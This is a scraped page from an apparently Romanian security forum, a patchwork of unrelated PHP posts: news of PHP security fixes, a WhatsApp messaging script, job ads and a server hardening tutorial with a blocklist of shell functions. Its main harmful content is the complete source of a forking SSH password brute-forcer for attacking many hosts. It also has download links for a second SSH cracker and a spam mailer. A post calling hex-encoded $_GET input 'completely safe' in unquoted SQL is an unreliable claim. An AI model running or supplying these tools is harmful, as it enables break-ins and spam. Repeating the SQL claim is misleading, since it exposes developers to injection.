Search the Community

Several new versions of PHP have been released, fixing a number of security vulnerabilities and other bugs in the popular scripting language. PHP 5.6.5 is the newest version of the language, and it has patches for a handful of vulnerabilities, including a use-after-free flaw that could lead to remote code execution in some cases. “Sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping’s length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping,” the description of the vulnerability says. There are a few other security vulnerabilities fixed in version 5.6.5, as well. One involves an initialized pointer in Exif. Another is a fix for a vulnerability that initially was patched in December. Apparently the patch did not completely fix the problem, which was identified by researcher Stefan Esser. The vulnerability is another use-after-free bug. “There is a small but important difference to the patch I sent on 10th December. You use zend_symtable_find instead of zend_hash_find from my patch. Because of this change the fix is incomplete. It now detects attacks that try to replace a key like “AAA”, but it does not fix attacks where the key is a numerical string like “123”. The reason for this is that we do not want integer keys in objects. That is why the code was added in the first place,” Esser said in an email to the PHP maintainers. “The object properties are therefore inserted via zend_hash_update, instead of zend_symtable_update. Therefore something like “123” will be inserted as a string and not as a numerical 123. On the attempt to do the overwrite attack you now check with zend_symtable_find(). This function will turn the “123” into a numerical “123” and therefore not see that it is already there. The protection will not be executed and therefore the attack works in the same way as before.” Source

Caut om care stie sa lucreze in php , html sau javascript . PM pentru detalii.

PHP Script to send and receive messages on WhatsApp I have been reading many tutorials for sending and receiving WhatsApp Messages via PHP but there is not a single Article Which explains properly with Steps that How To retrieve Your WhatsApp password Which is created and Stored when you create a WhatsApp Account on the WhatsApp Server which is the main Challenge as of now in other Articles. Thanks To this tool Which has Made 50% of the work Easy. https://github.com/shirioko/WART Okay So we will Quickly go through the Steps for WhatsApp Registration Tool : Go To the link https://github.com/shirioko/WART Download The Whole project by Clicking Clone to Desktop Run the WART-1.7.3.0 Exe File WART Enter Phone Number with Country Code (e.g. India Number : 91xxxxxxxxxx) P.s. Do not put any Special Symbol like (+91) for India Click on Request Code and You will Receive a Code from WhatsApp on the Entered Mobile Number. Now Verify that Code in 2nd Step and That’s it . You are here . Your password will Appear. P.s. Do not Share your password with Anyone Because it Can be used in loop for any Kind of messages. okay Now we are done with 50% of the task . Now we need to write the php Script Which will Send Messages to WhatsApp Registered Number. You will need 2 things for Sending Messages to WhatsApp through PHP : Username (WHICH IS YOUR MOBILE NUMBER WITH COUNTRY CODE) : 91xxxxxxxxxxx Password (Which You got From The WART.EXE TOOL Alright Sparky Lets Get this Done….. <?php require_once ‘./src/whatsprot.class.php’; $username = “919xxxxxxxxx”; //Mobile Phone prefixed with country code so for india it will be 91xxxxxxxx $password = “your password”; $w = new WhatsProt($username, 0, “Mayank Grover Blog”, true); //Name your application by replacing “WhatsApp Messaging” $w->connect(); $w->loginWithPassword($password); $target = ’91xxxxxxxxxxx’; //Target Phone,reciever phone $message = ‘Hello User !! This is a Tutorial for sending messages via php to WhatsApp Account’; $w->SendPresenceSubscription($target); //Let us first send presence to user $w->sendMessage($target,$message ); // Send Message echo “Message Sent Successfully”; ?> So Everything is Quite Clear in the above Script i.e. You need to set your Application Details Username as Mobile Number password Which you got from WART Tool Target as your Target Mobile Number and Lastly The message(Plain Text Which you need to send). Okay Now I know many Questions are Coming in your mind. In first line Require src/whatsprot.class.php What is This. ??? You Need to Download the WhatsApi from this Link . There You Will find the src directory with all the source files. Can we only Send Plain Text messages Or media like Images and Videos??? Yes we can send media file Also. So Next I will be writing php script to send Media file To any WhatsApp Account. SOURCE

This is a brief write up noting javascript backdoors left in common PHP shells. Read more: http://dl.packetstormsecurity.net/papers/general/backdoor.pdf

Php and mysql can even say .. not taught. In general, need a simple script ... For example in column 1 has the words "home" and "school" ... In the 2nd column values ??5 ... If you enter the word "school" is coming out if "house" Total of these "words" will be very much and sometimes 1 word will show 20 extra. words (and maybe more). It is desirable to be able to add "extra word." Or * extra. * word to the "word" .. Add a "word" - you can not, though, I'll just add, and this is not very important ... P.S. google translate

Din lipsa de timp, nu ma voi mai ocupa de aplicatiile desktop. Creez site-uri mici si mijlocii, scripturi, pagini, bug fixes, optimizari. Scriu cod curat si comentat. UPDATE: Dupa ce am vazut zeci de scripturi/pagini facute de unu si de altu', pot sa spun ca scriu caligrafic! Pentru site-uri complete ma pot ocupa si de gazduire si de configurarea serverului astfel incat site-ul sa fie predat "la cheie". Ofer si mentenanta unde este cazul. Backend: PHP + MySQL Frontend: HTML + CSS + jQuery / Bootstrap Metode de plata: Paypal sau Transfer bancar Plata: La finalizarea proiectului sau esalonat, de la caz la caz. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e

Inspirat de Dan Kaminsky, vreau s? v? prezint o metod? eficient?, simpl? ?i sigur? de protejarea aplica?iilor web împotriva vulnerabilit??ilor de tip MySQL injection. Tot de ce ave?i nevoie, este s? folosi?i urm?torul fragment de cod: array_walk_recursive($_GET, function (&$val, $key) { if (!is_numeric($val)) { $val = '0x' . bin2hex($val); } }); Dup? care, pute?i folosi orice variabil? din masivul $_GET f?r? a v? gândi la securizarea acesteia. De exemplu, urm?toarea instruc?iune SQL este complet sigur? ?i nu are nici o importan?? ce date con?ine variabila $_GET['name']: $sql = "SELECT * FROM users WHERE name={$_GET['name']}"; Spre deosebire de metoda lui Dan Kaminsky, în cazul dat, performan?a bazei de date nu va avea de suferit, iar ceea ce prive?te PHP — func?ia bin2hex() e mai rapid? chiar ?i ca mysqli_escape_string() — astfel, la capitolul performan??, totul e minunat. Totu?i, în dependen?? de aplica?ie ?i cerin?ele ei, vei fi nevoit s? schimbi corespunz?tor fragmentul de cod ar?tat mai sus. Cel mai corect ar fi ca s? creezi o nou? variabil? unde s? p?strezi datele ce le vei folosi la crearea interog?rilor SQL. De exemplu, putem crea urm?toarea func?ie: function hex_secure($vars) { array_walk_recursive($vars, function (&$val, $key) { if (!is_numeric($val)) { $val = '0x' . bin2hex($val); } }); return $vars; } ?i o folosim în modul urm?tor: $vars = hex_secure($_GET); $sql = "SELECT * FROM users WHERE name={$vars['name']}";

Am v?zut thread-ul lui @just-for-funn ?i dorind s?-l ajut am decis s? creez un thread nou în speran?a c? ?i altcineva îl va g?si folositor. Deci, vreau s? scriu despre o metod? simpl? de a traduce date folosind PHP ?i API-ul celor de la Microsoft. Lunar, pentru un singur cont ve?i primi gratuit 2 milioane de caractere (dac? ave?i nevoie de mai multe caractere, pute?i pl?ti sau, îi ruga?i frumos pe cei de la Illuminati s? v? ajute cu bani ?i conturi). Mai întâi de toate, trebuie s? ob?inem datele personale pentru a lucra cu API-ul. Pentru aceasta: Activ?m „Microsoft Translator” Copiem „Customer ID” Gener?m „Secret Key” Acum, când avem toate datele necesare, desc?rc?m urm?toare clas? PHP http://test.securrity.com/BingTranslator/class.phps ?i o salv?m într-un fi?ier local class.php. Apoi, modific?m variabila $config introducând datele ob?inute ?i rul?m urm?torul cod: require 'class.php'; $bt = new BingTranslator(); echo $bt->translate('en', 'ro', 'Hello RST'); Rezultatul va fi simplu ca „Bun? ziua RST”.

Buna ziua tuturor, In cadrul unei sesiuni de recrutare prevazuta pentru luna aprilie la Bucuresti, firma de recrutare Cooptalis cauta, pentru unul din clientii ei francezi (o importanta firma ICT implantata in mai bine de 40 de tari) PHP Developeri cu experienta si care cunosc programarea orientata obiect, precum si limba franceza. Posturile sunt bazate in nordul Frantei (Lille). Daca doriti mai multe informatii despre aceasta oportunitate, va rog sa ma contactati : raluca.sandu@cooptalis.com !

<?php function image_upload($image, $status){ require ('tmhOAuth.php'); //https://github.com/themattharris/tmhOAuth $tmhOAuth = new tmhOAuth(array( 'consumer_key' => "sfdgdsgsdfg", 'consumer_secret' => "dsfgdsfgdsfgsd", 'user_token' => "sdfsdfsdf", 'user_secret' => "fgdgdfgdf", )); $code = $tmhOAuth->request( 'POST','https://api.twitter.com/1.1/statuses/update_with_media.json', array( 'media[]' => "@{$image};type=image/jpeg;filename={$image}", 'status' => $status, ), true, // use auth true // multipart ); return $code; } echo image_upload('/var/www/crawl/img/62845745.jpg','Postat prin API'); ?> 1. creati o aplicatie in twitter developer si adaugati tokenurile 2. rulati functia image_upload('calea/absoluta/a/pozei','Postat prin API'); 3. il puteti cupla cu cel de facebook 4. adaugati in cron

Regex101.com is a free of charge regex testing service where you can easily create expressions while you simultaneously have real time error detection, highlighting and explanation of your regex. Thanks to the permalink feature, it is a great reference which may even be used in code where you need to explain your regular expressions to co-workers. Link: regex101.com

Se pare c? una din ultimele fapte demne de laud? ale companiei Google a fost trecut? cu vederea de c?tre comunitatea RST ?i nu mi se pare corect. Deci, intra?i ?i v? minuna?i — App Engine suport? PHP ?i e disponibil pentru to?i doritorii! Da, cu ceva restric?ii ?i înc? în stadie beta, dar nu e r?u, mai ales c? deja po?i instala Wordpress. Înc? o dovad? clar? c?, dac? nu se duce Mohamed la munte, vine muntele la Mahomed.

Salut, Caut o persoana care se pricepe "in" php destul de bine, Daca este cineva interesat, Are timp de asa ceva, contra cost binenteles. PM cu un id: icq / yahoo / jabber. Mersi.

SSH brute-forcer tool written in PHP. about: * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org usage: <?php/* .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * Usage : * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org */ error_reporting(0); /* * Call the class */ $SSH = new SSHBruter(); /* * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool */ if(!function_exists("ssh2_connect")) { $SSH->showErrorMsg(1); } elseif(!function_exists("pcntl_fork")) { $SSH->showErrorMsg(2); } /* * Parse arguments * There is 3 way to brute * Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread> * Combolist : -c <combolist> -o <output> -t <thread> * Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ $options_single = getopt("h:u:w:o:t:"); $options_combo = getopt("c:o:t:"); $options_multi = getopt("f:u:w:o:t:"); /* * Does arguments control! */ if($options_single) { if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null) { $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_combo) { if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null) { $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_multi) { if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null) { $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] ); } else{ $SSH->showErrorMsg(3); } } else { $SSH->showErrorMsg(3); } class SSHBruter { /* * Prints 'MAIN_MESSAGE' if arguments used wrong */ const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n********************************* ************\n"; /* * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found */ const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found */ const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'ARGMISS' if arguments not specified */ const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n"; /* * Counts hosts & passwords , increments in foreach loop */ private $counter = 0; /* * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread> */ function SingleBrute( $host , $user, $wordlist, $output , $thread ) { echo "\n"; echo "Host: ".$host."\n"; echo "User: ".$user."\n\n"; $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $perform_single = $this->SSH( $host , $user , trim($password) , $output ); if($perform_single) { print "Sleeping 120 seconds , PRESS CTRL + C NOW!"; sleep(120); } exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread> */ function ComboBrute( $combolist , $output , $thread ) { $chunk_combolist = array_chunk( file($combolist) , $thread); foreach($chunk_combolist as $combo) { foreach($combo as $hostuserpwd) { $this->counter++; list($host,$user,$password) = split(":",trim($hostuserpwd)); $fork = pcntl_fork(); if(!$fork) { $this->SSH( $host , $user , $password , $output ); exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ function MultiBrute( $hostlist , $user , $wordlist , $output , $thread ) { foreach(file($hostlist) as $host) { $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $this->SSH( trim($host) , $user , trim($password) , $output ); exit; } } $this->waitForThreadFinish(); } } } /* * Performs login to host with specified user and password(s) */ function SSH( $host , $user , $password , $output , $port = 22 ) { $connect = ssh2_connect( $host , $port ); if(!$connect) { print "[".$this->counter."] Host: ".$host." Connection Failed\n"; flush(); break; } else { $auth = ssh2_auth_password( $connect , $user , $password ); if($auth) { $a = "*********************************************\n"; $a.= "[+] Found!\n"; $a.= "[+] Host: ".$host."\n"; $a.= "[+] User: ".$user."\n"; $a.= "[+] Password: ".$password."\n"; print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n******************************************** *\n"; self::SaveResult( $output , $a ); return true; } else { print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n"; flush(); break; } } } /* * All error messages showing from there */ function showErrorMsg( $errno ) { print self::MAIN_MESSAGE; if($errno == 1) { print self::NOT_INSTALLED_SSH; exit; } if($errno == 2) { print self::NOT_INSTALLED_PCNTL; exit; } if($errno == 3) { print self::ARGMISS; exit; } } /* * Waits for threads to finish */ function waitForThreadFinish() { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); } } /* * Saves everything with this function */ static function SaveResult( $output,$text ) { $open_file = fopen( $output , "a" ); fwrite( $open_file , $text ); fclose( $open_file ); } } # miyachung represents / janissaries.org group ?>

[*] SSH_ Brute-force by MMxM Usage: ./ssh-crack.php <host> <user> <wordlist> Download: http://www.fileshare.ro/e29225522 Mirror: http://www.4shared.com/zip/F5gKTGjA/ssh-crack.html

Salutare, stiu ca primul meu post pe acest forum, dar am nevoie de ajutorul vostru. Sunt noob cand vine vorba de Java sau JQuery, dar am nevoie de o functie care sa imi ascunda div-uri. Am gasit mai multe functii pe google, dar trebuie sa am mai multe id-uri unice, iar eu trebuie sa pun asta intr-o functie foreach deci pot pune 1 <div class="ex"> urmand sa fie generate dinamic 5 divuri.

Ofer 30 usd LR unei persoane pricepute cu timp/chef de munca pentru a crea clona unui site (doar interfata) in php/html. Proiectul poate fi finalizat in mai putin de 2 ore. Panaramele sa se abtina. Detalii in privat.

http://mytest-php.web44.net/ Urmati instructiunile ... nu stiu ce sa ii mai adaug. Sper ca ma puteti ajuta voi cu niste sugestii. As vrea sa rafinez si povestea. Astept parerea voastra!

Login X Va rog si metoda/sintaxa. Explicati putin cumn functioneaza. PS: Stiu ca va bat la cap cu chestii deastea...

http://mytest-php.web44.net/ Nu stiu cat de posibil e sqlI pe acest website. Vreau sa invat mai multe despre php & sql si as fi foarte recunoscator sa lasati o mica explicatie despre: cat de vul e?; de ce?; ce trebuie modificat?;

Sql_err404

The script for spam mailing server through sendmail. In the tests showed good results, especially when a large number of servers. Description: Random, intellectual generation fields Subscribe to the attach Plain and html format Download: http://madnet.name/files/download/2_madspamer.php

Scripturi php la comanda/Vanzari Dupa cum spune si titlul, fac scripturi php la comanda. ______________________________________________ Tehnologi:Scriptul poate sa contina javascript,html,php,css,mysql. Contact: Imi dati pm, cu scriptul care il doriti si am sa va contactez. Plata : Cartela de reincarcare orange/Plata paypal. ______________________________________________ Vand : Cont -> Metin2.ro | level 45 | iteme bune | server : volans | pm pentru detali. Script php -> regenereaza toate parolele din db -> si trimite mail la fiecare user.

Salut, Ma intreb, in afara de HTML si CSS ce este indicat sa mai stii ca sa poti face ceva mai ok ? Browser Scripting - JavaScript si jQuery / AJAX ? Server Scripting - PHP ? Multumesc, Greenbytes

Acest tutorial este adresat celor care doresc sa isi configureze un server cu Debian. O sa acopar in in el urmatoarele aspecte: 1. Instalare kernel cu grsec. 2. Instalare si configurare apache. 3. Instalare si configurare php. 4. Instalare si module php (extensii). 5. Configurare suhosin. 6. Instalare MySQL Server. 7. Modificari diverse permisiuni pentru un nivel mai bun de securitate 8. Instalare nginx si folosirea lui ca frontend pentru apache (dual strat web server) ---------------- 1. Instalare kernel cu grsec. Daca nu stiti inca ce este grsec/grsecurity, un bun punct de plecare este Grsecurity. Pentru linux, grsecurity este un fel de "sfantul graal" in materie de securitate. In plus, va scapa de o problema ce o are linux si care pe mine ma irita: ps aux dupa user, arata toate procesele. root@tex:~# echo "deb http://debian.cr0.org/repo/ kernel-security/" >> /etc/apt/sources.list root@tex:~# wget http://kernelsec.cr0.org/kernel-security.asc root@tex:~# apt-key add kernel-security.asc OK root@tex:~# apt-get update root@tex:~# apt-cache search grsec linux-source-2.6.32.15-1-grsec - Linux kernel source for version 2.6.32.15-1-grsec linux-source-2.6.25.10-1-grsec - Linux kernel source for version 2.6.25.10-1-grsec linux-image-2.6.32.15-1-grsec - Linux kernel binary image for version 2.6.32.15-1-grsec linux-headers-2.6.32.15-1-grsec - Header files related to Linux kernel, specifically, linux-source-2.6.27.29-4-grsec - Linux kernel source for version 2.6.27.29-4-grsec root@tex:~# apt-get install linux-image-2.6.32.15-1-grsec linux-headers-2.6.32.15-1-grsec root@tex:~# init 6 # aici dam reboot pentru a boota noul kernel. // Dupa reboot root@tex:~# uname -a Linux tex 2.6.32.15-1-grsec #2 SMP Mon Jun 28 09:05:30 CEST 2010 x86_64 GNU/Linux root@tex:~# su - tex tex@tex:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND tex 2103 0.6 0.1 36908 1276 pts/0 S 00:58 0:00 su - tex tex 2104 13.0 0.6 23380 6200 pts/0 S 00:58 0:00 -su tex 2129 0.0 0.1 16332 1176 pts/0 R+ 00:58 0:00 ps aux Din cate observati, vad doar procesele mele dupa user. 2. Instalare si configurare apache. root@tex:~# apt-get install apache2-mpm-prefork apache2.2-common apache2.2-bin root@tex:~# rm /etc/apache2/sites-available/default root@tex:~# cat >> /etc/apache2/sites-available/default << EOF > NameVirtualHost * > > <Directory "/var/www"> > AllowOverride AuthConfig FileInfo Options Indexes Limit > Options FollowSymLinks > Options -Indexes > </Directory> > > <VirtualHost *> > DocumentRoot /var/www > ServerName 10.0.0.220 > CustomLog /var/log/apache2/access_log combined > ErrorLog /var/log/apache2/error_log > </VirtualHost> > EOF root@tex:~# Apache o sa-l listam pe 127.0.0.1 port 81 si o sa fie backend. root@tex:~# echo "Listen 127.0.0.1:81" > /etc/apache2/ports.conf root@tex:~# /etc/init.d/apache2 start 3. Instalare si configurare php (plus libapache2-mod-php5, necesar la apache (mod php)) PHP-ul o sa-l instalez de la dotdeb. root@tex:~# echo "deb http://packages.dotdeb.org stable all" >> /etc/apt/sources.list root@tex:~# echo "deb-src http://packages.dotdeb.org stable all" >> /etc/apt/sources.list root@tex:~# wget http://www.dotdeb.org/dotdeb.gpg root@tex:~# cat dotdeb.gpg |apt-key add - && rm dotdeb.gpg OK root@tex:~# apt-get update root@tex:~# apt-get install php5 php5-cli libapache2-mod-php5 php5-common php5-suhosin Inlocuiesc "expose_php = On" cu "expose_php = Off" / "short_open_tag = Off" cu "short_open_tag = On" si "session.name = PHPSESSID" cu "session.name = SERVLET" in php.ini pentru apache2. root@tex:~# perl -pi -e 's/expose_php = On/expose_php = Off/' /etc/php5/apache2/php.ini root@tex:~# perl -pi -e 's/short_open_tag = Off/short_open_tag = On/' /etc/php5/apache2/php.ini root@tex:~# perl -pi -e 's/PHPSESSID/SERVLET/' /etc/php5/apache2/php.ini 4. Instalare si configurare module php (extensii). O sa instalez urmatoarele extensii php: curl, gd, mcrypt, mysql. root@tex:~# apt-get install php5-curl php5-gd php5-mcrypt php5-mysql 5. Configurare suhosin. Din motive de securitate, o sa adaug in blacklisted utilizand suhosin urmatoarele functii: exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown root@tex:~# cat >> /etc/php5/conf.d/suhosin.ini << EOF > > suhosin.executor.func.blacklist = "exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown" > suhosin.cookie.max_array_depth = 256 > suhosin.cookie.max_array_index_length = 256 > suhosin.cookie.max_name_length = 256 > suhosin.cookie.max_totalname_length = 512 > suhosin.cookie.max_value_length = 20000 > suhosin.cookie.max_vars = 200 > suhosin.get.max_array_depth = 200 > suhosin.get.max_totalname_length = 1024 > suhosin.get.max_value_length = 1024 > suhosin.get.max_vars = 1024 > > > suhosin.post.max_array_depth = 1024 > suhosin.post.max_array_index_length = 1024 > suhosin.post.max_name_length = 1024 > suhosin.post.max_totalname_length = 1024 > suhosin.post.max_value_length = 95000 > suhosin.post.max_vars = 1024 > > suhosin.request.max_vars = 512 > suhosin.request.max_value_length = 90000 > suhosin.request.max_totalname_length = 1024 > suhosin.upload.max_uploads = 400 > > suhosin.executor.include.max_traversal = 2 > > EOF root@tex:~# Cam asa arata php in cli: root@tex:~# php -v PHP 5.3.8-1~dotdeb.2 with Suhosin-Patch (cli) (built: Aug 25 2011 13:30:46) Copyright (c) 1997-2011 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH root@tex:~# 6. Instalare MySQL Server si MySQL Client root@tex:~# apt-get install mysql-client-5.5 mysql-server-5.5 7. Modificari diverse permisiuni pentru un nivel mai bun de securitate Mountam tmpfs in /tmp cu flag-urile "noexec,nosuid,nodev" din motive de securitate. root@tex:~# echo "tmpfs /tmp tmpfs noexec,nosuid,nodev 2 2" >> /etc/fstab root@tex:~# mount /tmp root@tex:~# mount |grep "/tmp" tmpfs on /tmp type tmpfs (rw,noexec,nosuid,nodev) Stergem "/var/tmp" si il facem simlink catre tmp. root@tex:~# rm -rf /var/tmp/ && ln -s /tmp /var/tmp Dam chmod 640 la "/dev/shm" din motive de securitate. root@tex:~# chmod 640 /dev/shm 8. Instalare nginx si folosirea lui ca frontend pentru apache (dual strat web server) O sa listam port 80 cu nginx si o sa-l folosim ca frontend pentru apache, care se listeaza pe 127.0.0.1 port 81. (reverse proxy) root@tex:~# apt-get install nginx root@tex:~# rm /etc/nginx/sites-enabled/default root@tex:~# pico /etc/nginx/sites-enabled/default # fisier configuratie server { listen 0.0.0.0:80 default; server_name _; access_log off; error_log /dev/null; location / { proxy_pass http://127.0.0.1:81; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } Pornim nginx-ul. root@tex:~# /etc/init.d/nginx start Starting nginx: nginx. root@tex:~# [URL="http://i42.tinypic.com/121zmtx.png"]O sa pun un phpinfo in "/var/www/"[/URL] pentru a vedea daca este totul in ordine si o sa sterg index.html (default) root@tex:~# echo "<?php phpinfo(); ?>" >> /var/www/index.php root@tex:~# rm /var/www/index.html // restart la apache. root@tex:~# /etc/init.d/apache2 restart --------- Note: - Daca aveti intrebari legate de acest tutorial, va raspund cu cea mai mare placere. - Imi cer scuze pentru eventualele greseli legate de exprimare (am cam tras chiulul de la somn) - Nu am specificat sursa acestui tutorial pentru ca este facut de mine.